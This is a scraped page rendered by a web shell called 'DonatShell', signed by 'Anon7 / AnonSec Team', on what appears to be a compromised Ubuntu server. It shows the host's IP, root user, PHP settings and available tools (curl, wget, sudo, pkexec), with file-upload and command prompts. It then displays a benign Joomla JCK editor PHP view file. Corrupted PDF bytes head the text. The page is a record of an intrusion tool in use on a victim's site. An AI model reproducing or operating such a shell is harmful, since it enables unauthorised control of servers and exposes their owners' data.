%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/old/plugins/editors/jckeditor/install/views/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /var/www/html/old/plugins/editors/jckeditor/install/views/install/view.html.php
<?php
/*------------------------------------------------------------------------
# Copyright (C) 2005-2012 WebxSolution Ltd. All Rights Reserved.
# @license - GPLv2.0
# Author: WebxSolution Ltd
# Websites:  http://www.webxsolution.com
# Terms of Use: An extension that is derived from the JoomlaCK editor will only be allowed under the following conditions: http://joomlackeditor.com/terms-of-use
# ------------------------------------------------------------------------*/ 
defined('JPATH_BASE') or die;

 
JCKLoader::loadExtendClass('view'); 

class InstallViewInstall extends JCKView
{

	public $nonExecutableFilesTotal = null;
	public $incorrectChmodFilesTotal = null;
	public $incorrectChmodFoldersTotal = null;
	public $nonWritableImageFolderTotal = null;
	public $permission = null;
	public $folderPermission = null;

	public function __construct($config = array())
	{
		parent::__construct($config);
		$document = JFactory::getDocument();
	    $document->addStyleSheet($this->baseurl.'/css/style.css' );

        jimport('joomla.environment.browser');
		$browser = JBrowser::getInstance();
        $browserType = $browser->getBrowser();
        $browserVersion = $browser->getMajor();
		
        if(($browserType == 'msie') && ($browserVersion == 7))
        {
			$document->addStyleSheet($this->baseurl. '/css/style_ie7.css' );
        }
		elseif(($browserType == 'msie') && ($browserVersion == 8))
		{
			$document->addStyleSheet($this->baseurl.'/css/style_ie8.css' );
		}
		
		if(defined('JLEGACY_CMS'))
	   		$document->addScript(str_replace('plugins/editors/jckeditor/install','',$this->baseurl) .'media/system/js/mootools.js');
		else
			$document->addScript(str_replace('plugins/editors/jckeditor/install','',$this->baseurl) .'media/system/js/mootools-core.js');	

	
	}
	
	public function display( $tpl = null)
	{
	   switch($this->getLayout())
	   {
		case 'default':
		 $this->nonExecutableFilesTotal = $this->get('NonExecutableFilesTotal');
		 $this->incorrectChmodFilesTotal = $this->get('IncorrectChmodFilesTotal');
		 $this->incorrectChmodFoldersTotal = $this->get('IncorrectChmodFoldersTotal');
		 $this->nonWritableImageFolderTotal = $this->get('NonWritableImageFolderTotal');
		 $this->permission = $this->get('Permission');
		 $this->folderPermission = $this->get('folderPermission');
		break;
		case 'default2':
		$model = JCKModel::getInstance('Font','InstallModel');
		$this->fontFamilyList = $model->getFontFamilyList();
		$this->defaultFontColor = $model->getDefaultFontColor();
		$this->fontSizeList = $model->getFontSizeList();
		$this->defaultBackgroundColor = $model->getDefaultBackgroundColor();
	   	break;
		case 'default3':
		$model = JCKModel::getInstance('Folders','InstallModel');
		$this->useUserFolderBooleanList = $model->getUseUserFolderBooleanList();
		$this->userFolderTypeList = $model->getUserFolderTypeList();
		if( !defined('JLEGACY_CMS') )
			$this->userList = $model->getUserList();
	   	break;
		case 'default4':
		$model = JCKModel::getInstance('Template','InstallModel');
		$this->templateList = $model->getTemplateList();
		$this->stylesheetList = $model->getStylesheetList();
		$this->richcomboStylesheetList = $model->getRichcomboStylesheetList();
		$this->templateStylesheets = $model->getTemplateStylesheets();
		$this->richcomboStylesheets = $model->getRichComboStylesheets();
		$this->JCKTypographyBooleanList = $model->getBooleanList('jcktypography');
		
		break;
	   }
		
		parent::display($tpl);
	}





}

Anon7 - 2022
AnonSec Team